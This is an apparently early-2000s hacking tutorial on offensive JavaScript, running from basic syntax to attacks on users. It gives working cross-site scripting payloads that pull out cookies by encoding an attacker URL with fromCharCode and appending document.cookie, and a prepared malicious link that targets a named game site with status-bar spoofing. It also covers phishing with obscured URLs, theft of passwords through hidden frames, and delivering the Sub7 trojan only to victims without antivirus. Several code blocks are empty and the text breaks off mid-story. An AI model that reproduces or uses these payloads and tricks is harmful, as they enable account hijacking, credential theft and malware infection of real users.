Hacking With Javascript

Written by b0iler for http://b0iler.eyeonsecurity.net/

-things to come: example of stealing info from users (anti-virus programs and trojans), story of ciru cookie stealing from acanium, ThePull's javascript exploits, and the about:// exploit. Since so many people were asking when this tutorial would come out I decided to finally put it up. I'd appriecated some feedback. Flames without a reason are not welcome. This tutorial is not completely finished.. and probably never will be :(

-idea: cross site scriptting by opening a new page in a frame and then writting to form fields or somehow injecting javascript. Or somehow write the html to the top or bottom.

Intro

Javascript is used as a client side scripting language, meaning that your browser is what interprets it. It is used on webpages and is secure (for the most part) since it cannot touch any files on your hard drive (besides cookies). It also cannot read/write any files on the server. Knowing javascript can help you in both creating dynamic webpages, meaning webpages that change, and hacking. First I will start with the basic javascript syntax, then I will list a few sites where you can learn more, and then I will list a few ways you can use javascript to hack.

There are a few benifits of knowing javascript. For starters, it is really the only (fully supported) language that you can use on a website making it a very popular language on the net. It is very easy to learn and shares common syntax with many other languages. And it is completely open source, if you find something you like done in javascript you can simply view the source of the page and figure out how it's done. The reason I first got into javascript was because back before I got into hacking I wanted to make my own webpage. I learned HTML very quickly and saw Dynamic HTML (DHTML) mentioned in a few tutorials. I then ventured into the land of javascript making simple scripts and usful features to my site.

It was only after I was pretty good with javascript and got into hacking that I slowly saw it's potential to be used milisously. Many javascript techniques are pretty simple and involve tricking the user into doing something. Almost pure social engineering with a bit of help from javascript. After using simple javascript tricks to fake login pages for webbased email I thought about other ways javascript could be used to aid my hacking, I studied it on and off for around a year. Some of these techniques are used by millions of people, some I came up with an are purely theorectical. I hope you will realize how much javascript can aid a hacker.

1. Basic Syntax
2. Places To Learn More Advanced Javascript
3. Banner Busting & Killing Frames
4. Getting Past Scripts That Filter Javascript
5. Stealing Cookies
6. Stealing Forms
7. Gaining Info On Users
8. Stories Of Javascript Hacks
9. Conclusion

1. Basic Syntax

The basics of javascript are fairly easy if you have programmed anything before, although javascript is not java, if you know java you should have no problems learning it. Same for any other programming language, as most share the same basics as javascript uses. This tutorial might not be for the complete newbie. I would like to be able to do a tutorial like that, but I don't have the time or patience to write one. To begin if you don't know html you must learn it first!

Javascript starts with the tag <script language="javascript"> and ends with </script> Anything between these two tags is interpreted as javascript by the browser. Remember this! Cause a few hacks use the fact that if you use <script type="javascript"> and don't finish it all the html on the page underneath that is ignored. You can also use <script type="text/javascript"> and <</script>.. either way is fine. I would also like to mention that many scripts have  right before the </script> tag, this is because they would like to make it compatible with other browsers that do not support javascript. Again, either way is fine, but I will be using the  because that is how I learned to script and I got used to putting it in.

Javascript uses the same basic elements as other programming languages.. Such as variables, flow control, and functions. The only difference is that javascript is a lot more simplified, so anyone with some programming experience can learn javascript very quickly. The hardest part of scripting javascript is to get it to work in all browsers. I will now go over the basics of variables:

to define a variable as a number you do: var name = 1;
to define a variable as a string you do: var name = 'value';

A variable is basically the same in all programming languages. I might also point out that javascript does not support pointers. No structs to make your own variables either. Only variable types are defined by 'var'. This can be a hard thing to understand at first, but javascript is much like C++ in how it handles variables and strings. A string is a group of characters, like: 'word', which is a string. When you see something like document.write(something); it will try to print whatever is in the variable something. If you do document.write('something'); or document.write("something"); it will print the string 'something'. Now that you got the variables down lets see how to use arithmetic operators. This will make 2 variables and add them together to make a new word:

<script type="text/javascript">

</script>

first we define the variable 'name' as b0iler, then I define 'adjective' as owns. Then the document.write() function writes it to the page as 'name'+'adjective' or b0ilerowns. If we wanted a space we could have did document.write(name+' '+adjective);

Escaping characters - This is an important concept in programming, and extremely important in secure programming for other languages.. javascript doesn't really need to worry about secure programming practice since there is nothing that can be gained on the server from exploitting javascript. So what is "escaping"? It is putting a \ in front of certain characters, such as ' and ". If we wanted to print out:

b0iler's website

We couldn't do:

document.write('b0iler's website');

because the browser would read b0iler and see the ' then stop the string. We need to add a \ before the ' so that the browser knows to print ' and not interpret it as the ending ' of the string. So here is how we could print it:
document.write('b0iler\'s website');

There are two types of comments in javascript. // which only lasts till the end of the line, and /* which goes as many as far as possible until it reaches */ I'll demonstrate:

<script type="text/javascript">

</script>

The only thing that script will do is print "this will show up". Everything else is in comments which are not rendered as javascript by the browser.

Flow Control is basically changing what the program does depending on whether something is true or not. Again, if you have had any previous programming experience this is old stuff. You can do this a few different ways different ways. The simplest is the if-then-else statements. Here is an example:

<script type="text/javascript">

</script>

Lets break this down step by step. First I create the variable 'name' and define it as b0iler. Then I check if 'name' is equal to "b0iler" if it is then I write 'b0iler is a really cool guy!', else (if name isn't equal to b0iler) it prints 'b0iler can not define variables worth a hoot!'. You will notice that I put { and } around the actions after the if and else statements. You do this so that javascript knows how much to do when it is true. When I say true think of it this way:

if (name == 'b0iler')
as
if the variable name is equal to 'b0iler'

if the statement name == 'b0iler' is false (name does not equal 'b0iler') then whatever is in the {} (curely brackets) is skipped.

We now run into relational and equality operators. The relational operators are as follows:

> - Greater than, if the left is greater than the right the statement is true.
< - Less than, if the left is lesser than the right the statement is true.
>= - Greater than or equal to. If the left is greater than or equal to the right it is true.
<= - Less than or equal to. If the left is lesser than or equal to the right it is true.

So lets run through a quick example of this, in this example the variable 'lower' is set to 1 and the variable 'higher' is set to 10. If lower is less than higher then we add 10 to lower, otherwise we messed up assigning the variables (or with the if statement).

<script type="text/javascript">

</script>

and now the equality operators, you have already seen one of them in an example: if (name == 'b0iler') the equality operators are == for "equal to" and != for "not equal to". Make sure you always put two equal signs (==) because if you put only one (=) then it will not check for equality. This is a common mistake that is often overlooked.

Now we will get into loops, loops continue the statements in between the curly brackets {} until they are no longer true. There are 2 main types of loops I will cover: while and for loops. Here is an example of a while loop:

<script type="text/javascript">

</script>

First 'name' is set to b0iler, then 'namenumber' is set to 1. Here is where we hit the loop, it is a while loop. What happens is while namenumber is less than 5 it does the following 3 commands inside the brackets {}: name = name + name; document.write(name); namenumber = namenumber + 1; The first statement doubles the length of 'name' by adding itself on to itself. The second statement prints 'name'. And the third statement increases 'namenumber' by 1. So since 'namenumber' goes up 1 each time through the loop, the loop will go through 4 times. After the 4th time 'namenumber' will be 5, so the statement namenumber < 5 will no longer be true.

Let me quickly go over some short cuts to standard math operators, these shortcuts are:

variable++; // adds 1 to variable.
variable--; // subtracts 1 from variable.
variable+= something; // adds something to variable. Make sure to use 's if it is a string like:
variable+= 'string';
variable-= 3; // subtracts 3 from variable
variable*= 2; // multiples variable by 2.

Next loop is the for loop. This loop is unique in that it (defines a variable; then checks if a condition is true; and finally changes a variable after each time through the loop). For the example lets say you want to do the same thing as above. This is how you would do it with a for loop:

<script type="text/javascript">

</script>

First the variable name is defined, then it starts the for loop. It assigns 1 to namenumber, then checks if namenumber is less than 5 every time through the loop, and it increases namenumber by 1 every time through the loop (variablename++ means increase the variable by 1). The next 2 lines are the same as with the while loop. But since the for loop handles the declaration of namenumber and the increase every time through the loop it makes it simpler for the scripter and easier to keep track of for people trying to read the code. You can use a while loop if you want, it is all up to the scripter's preference.

Lets go over that for loop one more time, just for clarity. for (done only the first time; loop continues while this is true; done after every time through the loop)

That's it for learning javascript, this was really basic and pretty much covered things that are constant in most languages. For javascript specific guides check out the next section of the tutorial. This section was only to give the user enough info to understand the rest of the tutorial. I wish I could go over more, but there are way better tutorials for advanced javascript then one I could ever write.

2. Places To Learn More Advanced Javascript

I will just provide a list of tutorials and sites with more advanced javascript. If you wish to learn javascript and be able to write your own you will have to look at other people's scripts for examples and read a few more tutorials. I just went over the very basics so you wouldn't be lost.

http://hotwired.lycos.com/webmonkey/programming/javascript/tutorials/tutorial2.html - good examples, not really advancced.. prolly a medium level javascript tutorial.

http://www.webdevelopersjournal.com/articles/jsevents2/jsevents2.html - A javascript tutorial on event hhandles. Fairly advanced.

http://www.htmlguru.com/ - a classic site, go to the tutorials section and learn a lot of advanced javascript made easy.

http://server1.wsabstract.com/javatutors/ - Goes over some specific aspects to advanced javascript work. Useful in many situations.

http://www.pageresource.com/jscript/index6.htm - The advanced string handling andd the forms tutorials are good, I would suggest reading them if you wish to get more into javascripting.

Coolnerd's Javascript Resource - A nice list of al the javascript operators, statements, objects.. although it might be alittle old I still use it all the time.

If you want to create your own javascripts for yoursite be warned. Javascripts are very limited in power, but can be the solution to many simple problems. You will have to spend a few weeks learning more advanced javascript in order to make anything really useful. Creating that awsome DHTML (Dynamic HTML) feels really good ;) Dynamic HTML is pretty much javascript that interacts with the user, css, and layers - <div>, <span>, and <layer>.

Here is some links to good dynamic html sites:

The Dynamic Duo, Cross browser dynamic html tutorial - Goes over things step by step.

Taylor's dynamic HTML tutorial - That nice webmonkey style that everyone loves.

Curious Eye DHTML tutorial - This will really get you going making cross browser Dynamic HTML.

Intro to DHTML - Might be nice if you aren't as html and javascript knowledgable as most DHTML beginners.

Good luck with your adventure into javascript =)

3. Banner Busting & Killing Frames

I call it banner busting, it is when you use javascript (or other tags) that aren't rendered by the browser the same as normal html tags to get around a popup or banner that free sites automatically put on your page. The basic idea of this is to have a tag that isn't rendered as html right before the html the site adds on their banner so that user's browsers do not see the banner. There is only really one key thing you need to find out in order to kill that banner. This is what tag the site uses as a "key". What I mean by this is what tag does the banner they add come before or after? Try putting up a page with just:

<html>

<body>

text

</html>

noow upload that page and view it in a browser. View the source of the page and find where the site added it's banner html. If it came after the <html> and before the <body> then you need to see if it came before or after the  which is in between those. If it is before, then it is the <html> tag that is the key tag which the site adds it's banner after. If it is under the  than you know it puts it after the <body> tag.

So now that we know where the site adds it's banner html what do we do to stop it? We try to make a "fake" tag and hopefully the site adds it's banner html to the fake one instead. Then we use javascript to print the real one. We can do a few things, here is the list:

the basic <noscript> - this used to work, as most banners or popups start with some javascript, but now free sites have gotten smart and automaticly add a </noscript> to stop it.

<noscript>
<keytag> -this keytag is the decoy. Before/after this tag is where the banner would be.
</noscript>
<keytag> -this keytag is the real one.
<script> , <style> , <xml> - these are a few examples of tags that will make the add on html and javascript of the site's banner not render by the browser. since it is not in the syntax of css, xml or javascript (it is html) user's browsers will just ignore it.

<style>
<keytag> -this keytag is the decoy. Before/after this tag is where the banner would be.
</style>
<keytag> -this keytag is the real one.
printing tags with javascript - this one was thought up by acecww and works really well, if you are having problems when you put the real keytag then try using javascript so the site doesn't even see it as the keytag. you get javascript to print the tags one letter at a time.

<script type="javascript">

</script>
<style>
<keytag> -this keytag is the decoy. Before/after this tag is where the banner would be.
</style>

If all worked out you should have a page with no annoying popups or flashing banners. If not I guess you will have to play around a little and figure it out for yourself. Since every free host uses different keytags and methods of adding it's banner I can't go over them all one by one.

I decided to go over a real example of a free site that add popup ads or banners to every page you have. I'll be using angelfire since I hate them and because that's the one I picked out of my lucky hat. Just remember that sites can change the way they add banners anytime they feel like, so this method might not work the same way as I am showing. Doing this also breaks the TOS (Terms Of Service) with your host, so you might get your site taken down without any warning. Always have complete backups of your site on your harddrive, espechially if you have a hacking site or are breaking the TOS.

angelfire

------------------------
begin
------------------------

<html>
<head>
<title>testing</title>
</head>
<body>


</noscript>
<script language="JavaScript">

</script>


<p> rest of test page</p>

</body>
</html>

------------------------
end
------------------------

as you can see angelfire puts their ad right after the <body> tag. All they are using to protect us from getting rid of the ad is a </noscript> so.. we can put something like this to defeat the ad:

<style>
<body>

</style>
<body>

So angelfire's server will add the javascript for thier advertisment after the first <body> they see. That will put the ad after <style><body> and before </style>. This means that user's browsers will think that <body> and the angelfires ad is css (cascading style sheet).. which is the <style> tag. Since javascript and html cannot be in css the browser ignores it. We then put the real <body> after this and continue with our site.

About a month after I wrote this I came up with an idea of how to complete remove the advertisments sites put on your pages. I am not 100% sure it will work, but the basic idea is to have a cgi script open all the .html pages in your directory, remove the ad, and write the html back to the .html files. Few things might affect how well this works. First if the script that adds the ad to the .html files is a cron job, but I doubt this, since it would put heavy strain on the system to search and write to all those files. Second, the script might be ran whenever a .html file is editted, I am hoping that it is only ran when a file is created or a file is uploaded. I'll test this out someday, if you want this script come bother me on irc about it and I might finish it =)

Killing Frames

Now I'll go over how to kill frames. The reason you would need this script is to hack namezero, nbci, and other companies which put your page in a frame. Killing a frame means to get rid of it so that your site is the one filling the whole window.

There is one solid way which has always worked for doing this. Not only will it bust out of companies frames.. But if some lamer is leeching your site by using frames this will stop them. The script is as follows:

<script type="javascript">
if (self != top) top.location.replace(self.location);
//-->
</script>

What this script does is checks if the current page is not the top (first) frame, if it isn't then it puts itself as the top frame, deleting the other frame from the browser window. Pretty handy trick =)

4. Getting Past Scripts That Filter Javascript

Lets say we are entering info to a guestbook. This would be put on the main page of the guestbook. And whenever anyone visited that page we want them to be sent to http://www.lameindustries.org. We would enter this in the guestbook:

<script type="javascript">
document.location = http://www.lameindustries.org;
//-->
</script>

Sometimes when you want to use javascript there is some form of filtering going on that stops the <script> tag from being rendered as usual. For those of you who know perl I will demonstrate.

[Line from a perl script that filters input for the <script> tag]

$input = s/<script/<script/ig;

$input is what you submitted to the perl script, what it is doing is looking for <script in your input and replacing it with <script. So how do you get around this? We can use the hex value of any or all characters in <script type="javascript"> the only characters you cannot do this for are the < and the > because they would not be rendered by the browser if you did. So now we enter something like this into the guestbook:

<script type="javascript">
document.location = http://www.lameindustries.org;
//-->
</script>

How did I know what the hex value of 's' was? I just checked an ascii chart and added & before it and ; after it. You can use this in the url of your browser as well, just put % before the number. A chart ascii chart is available at www.lameindustries.org/tutorials/tutorials/wtf_is_hex.shtml or man ascii if you run *nix.

There are a few other situations where javascript can be useful. If you can get around the filter on a users email you can use your spoofing email skills to send an email from someone they trust. If they open it you can have the email redirect them to a page which says something like "session timed out, please login in again" and have that form submitted to a cgi script that logs it. This works for a small percentage of people, but it is worth a shot sometimes.

Getting by javascript filters can lead to you getting cookies for such things as forums, shopping carts, sites, and redirecting users to the site of your choice. Anywhere there is input that is displayed on a page which other people may visit (or you can make them visit) there is an opportunity to use javascript to steal information. Infact just today as I am writing this it was found that lycos and other search engines are vulnerable to javascript in website's descriptions and names, read the slashdot story for more info. This could lead to 100% clicks for any search your site turns up on ;).

Here is a cert advisory concerning insertion of scripts (javascript, vbscript, etc..) inputted into scripts:

http://www.cert.org/advisories/CA-2000-02.html

update: there has been a new advisory for hotmail and other sites which filter javascript. The problem lays in css and the use of the <link> tag. When the following code is used the linked javascript will be executed, making it possible to steal cookies, info, or redirect users to a fake login page.

<LINK REL=STYLESHEET TYPE="text/javascript" SRC="script.js">

put that in the body, preferably as the first thing. Of course hotmail patched it days after it was reported, but it stand to show that hotmail is not 100% secure and there will still be ways in the future to get scriptting executed. Also other web based email, guestbook, message boards, etc.. might be vulnerable to this. You can use old hotmail exploits on many other scripts that allow input and print them to a .html file. I found this vulnerability in a script that cyberarmy.com ran for their web based mail, I just did a <script type="javascript"> and redirected the user to a fake login page. When they logged in with their user and password it sent them to a script that wrote their info to a database and then logged them into the web based email script again. The script was made by solutionscripts, and cyberarmy is no longer vulnerable.

Also note that normal text field input is not the only way to insert data into a script. Hidden fields and environment variables are also sometimes vulnerable. Some scripts will filter all the text fields, but will not filter the hidden fields, this allows you to insert javascript or other nasty things. I won't go to much into that since it would require a whole nother tutorial and because writting javascript isn't the first thing you would try to exploit with that. Environment variables that you can exploit are usually referrer or user-agent, since those tend to be the only ones ever written to a file, they are also the least filtered input in my experience. It's much easier to find ways to insert javascript if you can get ahold of the source of the script. There are two easy ways to do this, the first is to see if the script is open source, then go download and review the code for holes. The other is to look for other scripts/exploits that allow you to view the source of other scripts. So do some research for other exploits in other scripts (or the webserver itself).

5. Stealing Cookies

note: to do this you'll need a little bit of advanced javascript knowledge, and some perl/php/asp (or other server side language).

Stealing cookies can be a dangerous problem for many sites. It all depends on how the site sets up it's security. If a site just uses cookies to identify users than it could be vulnerable. If you need to login then it is almost useless to try and steal cookies. Unless of course the username and passwords are stored in the cookie and is not encrypted. Sometimes you are allowed access without logging in. We will pick on http://neworder.box.sk since they stold some LI tutorials, even though they are not vuln to this because you must login to their site and the user password is not in the cookie. (Lets see if they steal a tutorial which explains how to exploit a hole in one of their scripts ;) How we will be exploiting this bug is simple. Luckily cube left us a vulnerable script on the site to play with. The script is http://neworder.box.sk/box.php3?prj=neworder&newonly=1&gfx=neworder&txt=what's+new.

What is vuln about this script? It doesn't escape the inputted characters that are printed to the page. I told you escaping characters is important. The script instead relies on a simple <pre> tag to stop javascript. So the first thing we must do is test and see what character's (if any) are left unescaped for us to use. After a check for these characters: ' " ; | < > / and % we find that he does escape ' and ". If he didn't we could exploit the php script itself and have total control over the site. I will get to a little trick in a second where we can get javascript to print out ' and ". But for now we must stop that <pre> tag. So we end it with a </pre> then insert any javascript we would like.

In the first paragraph I said that javascript is mostly secure, because it cannot read or write any files off a users hard drive besides cookies. Here we will use javascript to read the user’s cookie for neworder and then use javascript to send them to a cgi script where we log their cookie to a txt file. After this we check the log from the cgi script and save the cookie where our browser keeps them. Or we can get the username and password from the cookie and login to the site (neworder doesn't keep the user's password in the cookie).

So now to print the javascript that will steal the cookie. What we are doing is using the script that prints out unescaped characters to the page as if it was javascript that was really on that website. So we can view and edit user cookies. There are two main problems we must overcome. First we need to print a string without using ' and " since the .php script on neworder does escape those characters. How we do this is by using javascript which doesn't need ' or " and prints out any character. This is one way to do it:

<script type=text/javascript>
var u = String.fromCharCode(0x0068);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0070);
u %2B= String.fromCharCode(0x003A);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0073);
u %2B= String.fromCharCode(0x0069);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0065);
u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006F);
u %2B= String.fromCharCode(0x006D);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x0067);
u %2B= String.fromCharCode(0x0069);
u %2B= String.fromCharCode(0x003F);
u %2B= document.cookie;
document.location.replace(u);
//-->

</script>

We need to use %2B instead of + because + becomes a space when you go to the script. There is probably an easier way of doing this besides using fromCharCode, but I couldn't think of any =) The 0x0068 is ascii for h. 74 is t.. (You can get an ascii chart from http://www.elfqrin.com/docs/hakref/ascii_table.html):

68=h
74=t
74=t
70=p
3A=:
2F=/
2F=/
73=s
69=i
74=t
65=e
2E=.
63=c
6F=o
6D=m
2F=/
61=a
2E=.
63=c
67=g
69=i
3F=?
In other words it makes the var u equal to the string http://site.com/a.cgi?

All right, so we got a string in a variable without using ' or ". var u = 'http://site.com/a.cgi?'; would be the same thing if the script didn't filter for ' and ". So now that we got the string going what should we do? Well what we are trying to do is get the cookie in a string and then send them to a cgi script that logs what's in the cookie. document.cookie is the cookie for that site. If there is more than one cookie then you have to use a little trickery. try this page for learning how to handle multiple cookies. Now we need to add the cookie to the end of the url. So:

u %2B= document.cookie;

Wham! Our var u is now: http://site.com/a.cgi?user_s_cookie (but user_s_cookie is actually the value in their cookie). So now we make javascript redirect them to that url.

document.location.replace(u);

This will send them to our var u, where a.cgi will be a cgi script that just logs whatever is inputted to it into a database. Another way to log their cookie would be to put something like:

<img src="//site.com/somedir/(document.cookie)">

But since this script filters ' and " it would be a really long url to put fromCharCode's for every character.. Also, you would have to have access to the logs of the site in order to check what files were requested from 'somedir' directory.

All cookie stealing techniques require some kind of script on your website to log the cookie when it is sent as a url.

Once you have a user's cookie there are 2 things it can be used for. Sometimes sites put their username and password right in the cookie. In this case you can just log into the site with that. Some other sites just simply use a cookie to authenticate users. No login required.

Take for example http://www.oocities.org/.. If you get a 404 error it will print out the url:

like this

now if you have a cookie of a geocities member you can go to www.oocities.org and you will automatically be logged in. From there you have full control over their account.

But geocities did do something to stop this. They have their website go to http://geocities.yahoo.com .. So the cookie for users is actually a yahoo cookie ;( If you try the same trick where you go to a 404 file on yahoo it won't print the < and > characters. But if you were to find a script on yahoo that printed out < and > you could easily do this =) And there are scripts on yahoo.com which are vuln to cross site scriptting, a few have been reported to bugtraq and I found another one.

So how would you get users to visit these urls? Try things like ...

Yeah all you redlite players, check out this hidden pick, funny as hell: Check this page out! Or better yet.. Load it in a frame that is 0% large. The user won't even know what hit them =)

oh, the source for that redlite link is:
<a href="http://www.redlite.org/signup/signup2.php?username=<script type=text/javascript>var u = String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003A);u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0062);u %2B= String.fromCharCode(0x0030);u %2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x006F);u %2B= String.fromCharCode(0x0072);u %2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003F);u %2B= document.cookie;document.location.replace(u);</script>" onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return true" onMouseOut="window.status='';return true"> Check this page out! </a>

notice the:
onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return true"
and
onMouseOut="window.status='';return true"
at the end.. This is to trick the user into thinking that the link leads somewhere else. Again, using javascript to manipulate what the user sees to help trick them.

Another script in the edge engine that is vulnerable to cross site scriptting is board.php, here is the exploit

http://www.site.com/board.php?search= &did=edge0

sure am glad bsrf doesn't run it ;-)

So how can a coder stop this vulnerablitiy? I would say never print user inputted data back to the user. also filter out <, >, and pack all url encoding before filtering input. I found a way to steal cookies in the old ikonboard using the profile.cgi, although it wasn't too big a deal since there was more serious holes in ikonboard it still way bad programming practice to print unfiltered input. Now ikonboard does not use profile.cgi, it doesn't print inputted data to the screen, and it filters data. Usually web based email scripts are very vulnerable to cross site scriptting.. and that holds true for a vulnerability in solution script's alais-mail script that I found last year.

A few other problems with javascript and cookie stealing:
http://www.peacefire.org/security/hmattach/ - A hotmail exploit. Since hhotmail didn't filter javascript and allowed .html attachments to be viewed and not downloaded.

http://www.securityspace.com/exploit/exploit_1b.html

http://www.peacefire.org/security/iecookies/ - Opening the cookie jar, remote ccookie viewer. using %2F instead of / makes ie think it's a intranet site.

http://homepages.paradise.net.nz/~glineham/cookiemonster.html

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms01-055.asp - Actually active scriptting, not javascript.

Then there is the new about:// and file content reading vulns in ie that have been reciently posted to bugtraq.. I plan on discussing these in detail when I update this tutorial.

Most people say to me, "but no one with any clue about security is going to click on the link which has javascript to steal cookies" and this is true. When the plain url is http://site.com/vulnscript.cgi? That is why we need to trick them into thinking the url isn't dangerous. Here is one way:

obscuring urls:

One way of tricking a user into clicking a link they thought lead somewhere else was to use that onmouseover trick to make the url look like it is pointting somewhere else. Obviously you cannot use this while on protocols that do not support html or that completely block javascript and onmouseover. So instead of http://site.com you can have http://127.0.0.1 this might not help too much so how about we use alittle trick. When browsers login to .htaccess directories they can use the following syntax:

http://username:password@site.com

You'll see why this is important in a minute. Without the password you can have things like:

http://username@site.com

and it will work fine. It will try to login to site.com with the username = 'username' and no password. Now what happends if there is no .htaccess file? Then it doesn't matter what the username or password is, and the page loads normal. So something like this could be used:

http://microsoft.com/site/dir/helpdesk.asp@site.com

You see how this could be used to get people to click on a link thinking it leads somewhere else? Even if it is in plain text many people will beleive this link goes to microsoft.com. Now that we have a link lets obscure it a bit =)

There are many different ways to obscure urls from users to help aid you into tricking them. One of them involves converting ip addresses into their decimal equivilants. I am not going to cover this, but there are plenty of other tutorials on the net where you can learn. I'll just let you use this script to automaticly convert ip addresses to the decimal value.

Now use this instead of site.com and you get something like:

http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F [insert nasty javascript url encoded here]

now that does not look like http://site.com/a.cgi?

which would be very clear for users to tell what it is doing. Lets go over the steps one more time, just to be sure you got it. First make up any site name (doesn't have to be valid url)

http://aol.com/scripts/userid.jsp?

Add a @ to the end

http://aol.com/scripts/userid.jsp?@

Then the ip address of the host in decimal form

http://aol.com/scripts/userid.jsp?@3639550308

then the rest of the path in urlencoding.

http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F

Also url encode the javascript and put it at the end. This is just one method of obscuring the url, there are others.

6. Stealing forms

Ok, this method will not be used very often, and isn't too valuable a skill to the average hacker.. But it can come in very handy. This was originally a news post on my site, but it fits into this tutorial nicely. I know that this part might be very poorly explained and many people won't understand how it works. But I have tried to atleast make it so people with advanced javascript knowledge can make some sense of how the attack works. Also note that this attack is purely theory, I have not used this against an actual site yet. It might even be used against sites which require you to fill in a form to login, this means hotmail, yahoo, and 100,000,000 other sites, but it would require extra coding, some of which I am not sure if it is possible.

Ok, in this article I will explain how to steal info from users by using javascript.

What this exploit requires is: A script that prints info you want into an input field.
The script doesn't check the referrer.

The most used reason for this would be to get usernames and passwords from sites. An example of this would be cyberarmy.com which was vulnerable to this for along time. You will notice that if we did have the user's cookie that we could have simply viewed this page and gotten their password, but cyberarmy was pretty secure in not printing unescaped data to the user's browser.

Now we will be doing this:

1 main page with 2 frames.
frame #1 - will look like a normal page and will steal the info from frame #2.
frame #2 - will load the page in a hidden frame.

this is what the main page will look like:

-------- begin --------

<html>

<script language="JavaScript"><script language="javascript">');
window.vulnscript.document.writeln('location.replace(http://www.cyberarmy.com/zebulun/userconfig.pl);');
window.vulnscript.document.writeln('<\/script>
</script>

</html>

-------- end --------

of course in reall use the size of the cols would be set so frame #2 (vulnscript) would be 0%.. So that the user wouldn't even know what is happening.

Now this is what the fuckca.html is:

-------- begin --------

<html><bbody>
<script type="text/javascript">

</script>
</body></html>

-------- end --------

all this does is print out the value of the first (unnamed) form from the frame named vulnscript (the one that has the page where we want to steal data from).

This is what their userconfig.pl displayed that we were grabbing:

Password : <INPUT TYPE="password" SIZE=45 NAME="pass1" MAXLENGTH=16 value="testpass">

The problem is that it would display the password in plain text (value="testpass" - testpass is the password) why it did this I don't know, stupid programming I guess. But if you got a hold of someone’s cookie you could view that script and it would give you the pass.. So what this little trick with frames and javascript does is make users visit the page without knowing and then lets our javascript grab their password. Instead of printing the password to frame #1 (name=blah) we could have sent an invisible frame to a script which logs input. Example:

instead of

parent.blah.document.write(name1);

have

parent.vulnscript.location.replace(log.cgi?name1);

I would then tell a few people who I want passwords from about this page, say "hey, want to see a picture of my girlfriend?" (All hackX0r guys like pics of girls) then I would just put up some stupid pic.. Maybe Britney Spears or something. The log.cgi would log both name1 (their password) and $ENV{'REMOTE_ADDR'} (their ip address). This would let me match up usernames to passwords fairly easy. You could also get their username from grabbing it off the page, or from the contents of the cookie.

This attack is fairly complicated, so I didn't explain why I did a few things. I figure anyone who could actually pull this off would understand why. Also not many sites are vuln to this, and even the ones that are usually the attacker does not have the ability to hop on the irc channel and trick people into viewing it.

7. Gaining Info On Users

Ok, this is probably the least likely technique in this tutorial to be used. All the rest can be used fairly often. This one is used to gain enough info on someone in order to form a trojan attack on them. What this javascript will allow us to do is to probe their system and see if they have any security against our attack. It will let us see what anti-virus program they use, what firewall they use, and if they have any programs that allow us to infect them with macros.

This was originally a bugtraq post: (http://www.securityfocus.com/archive/1/224673) with a link to the example at http://oocities.com/dzzie/sys_snoop1.html but we are going to probe for more security related programs. (put a probe for anti-virus programs, firewalls, word, adobe acrobat [pdf])

Lets say we check for anti-virus programs, if they don't have any you can display a link to download sub7 and say it is a video game... if they do have an anti-virus program you can display the link to the real game. This way you don't have to worry about the user finding out that you tried to send them a trojan. Only users who don't have an anti-virus program will have downloaded the trojan.

One possible future for trojan's is modules that you can insert to attack specific programs. For instance if you know the user is running a certain type of anti-virus program and they are running a certain type of firewall you can plug those modules into the trojan. When the user downloads and runs this trojan the modules will trojan those anti-virus and firewall making them seem as if they are running fine, when they aren't. Ether they won't detect your trojan or they will replace them with a emtpy program that just puts the icons in the taskbar and task list. I will try to get a working deminstration of how javascript can be used to download the correct trojan for a user's system or detect if the trojan will be detected by an anti-virus program so it will make them download a regular file.

If you have a firewall or anti-virus program please send me the full address (absolute address) to all the images it has. email the list to b0iler@hotmail.com What the javascript will do is try and load that image, if it does then ie will return a true value, if it doesn't ie will return false and we will know the user does not have that software installed. When I get enough info on the main anti-virus and main firewalls I will put together the code and explain it better.

This section isn't really done, but I am getting sick of writing so I guess I'll have to finish it later. All I am going to do is add a demo of how to check for anti-virus programs.

8. Stories Of Javascript Hacks

I have decided to add a section here of a few interesting javascript hacks I have heard about and seen. Since normal web site defacments and such are full of script kiddies who just ./own site.com with no creativity or thought I like to hear a nice story of hackers coming up with cool ways to manipulate systems and people.

First story is about a webgame called redlite (taken from a tutorial I wrote a few weeks ago)

What happend was that a friend of mine found his first exploit and with the help of someone else coding it - got it to work really good. Before I continue with the story you'll need to know alittle bit about the situation.

In #b0g on us.undernet.org, a place where I hang out sometimes there is alot of people into this online game called redlite. The object of the game is to fight people in an online version of a drug war. You have crack, hoes, guns, money, and the like. Now a few days prior to this I was about to sign up for it just to see what all the fuss was about, as I was signing up I saw that the registration script prints what is inputted to it. The script also didn't filter anything but ' and " from the input, so it could be used to steal cookies from users. I coded up the exploit and tested it... everything worked fine. But I never found out if you can do anything with just a user's cookie. And I didn't really care about the game, so the exploit never really got used. When I went back into #b0g xhaze and tak, two redlite players and b0g gimps had found another script that prints something to a page.

